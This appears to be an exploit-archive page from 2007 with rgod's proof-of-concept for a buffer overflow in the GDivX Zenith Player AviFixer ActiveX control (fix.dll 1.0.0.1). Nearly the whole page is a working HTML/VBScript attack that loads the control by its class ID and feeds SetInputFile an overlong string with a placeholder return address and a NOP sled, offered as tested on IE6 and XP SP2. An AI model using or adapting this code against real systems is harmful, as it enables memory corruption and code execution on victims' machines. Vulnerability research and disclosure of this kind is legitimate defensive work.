[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC
# Published : 2007-05-09
# Author : rgod
# Previous Title : McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC
# Next Title : Opera 9.10 alert() Remote Denial of Service Exploit
<html>
<object classid='clsid:2225E9BC-AFB3-4ED4-B20E-4F6CF1C39F8B' id='target'></object>
<script language = 'vbscript'>
' IE 6 / GDivX Zenith Player AviFixer Class (fix.dll v. 1.0.0.1) buffer overflow POC by rgod
' tested on xp sp2
EIP= "BBBB"
BOF=String(264, "A") + EIP + String(9999, unescape("%90"))
target.SetInputFile BOF
</script>
</html>
# www.Syue.com [2007-05-09]